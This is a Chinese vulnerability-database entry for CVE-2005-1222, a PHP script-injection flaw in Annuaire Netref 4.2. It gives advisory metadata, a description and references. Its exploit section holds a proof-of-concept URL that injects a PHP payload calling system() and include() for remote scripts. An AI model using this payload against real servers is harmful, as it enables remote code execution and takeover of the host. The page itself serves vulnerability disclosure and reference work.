Annuaire Netref漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108695 漏洞类型 未知
发布时间 2005-04-20 更新时间 2005-05-02
CVE编号 CVE-2005-1222 CNNVD-ID CNNVD-200505-800
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25467
https://www.securityfocus.com/bid/90130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-800
|漏洞详情
AnnuaireNetref4.2中的cat_for_gen.php使得远程攻击者可以通过设置ad_direct参数来引用cat_for_gen.php,然后将该代码包含在m_for_racine参数中,之后代码再被写入cat_for_gen.php,从而执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/13275/info

A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer. 

http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>
|受影响的产品
Netref Netref 4.2
|参考资料

来源:XF
名称:netref-catforgen-code-execution(20198)
链接:http://xforce.iss.net/xforce/xfdb/20198
来源:OSVDB
名称:15717
链接:http://www.osvdb.org/15717
来源:SECUNIA
名称:15040
链接:http://secunia.com/advisories/15040
来源:BUGTRAQ
名称:20050419AnnuaireNetrefv4.2[fwritephp]vulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111403947305600&w=2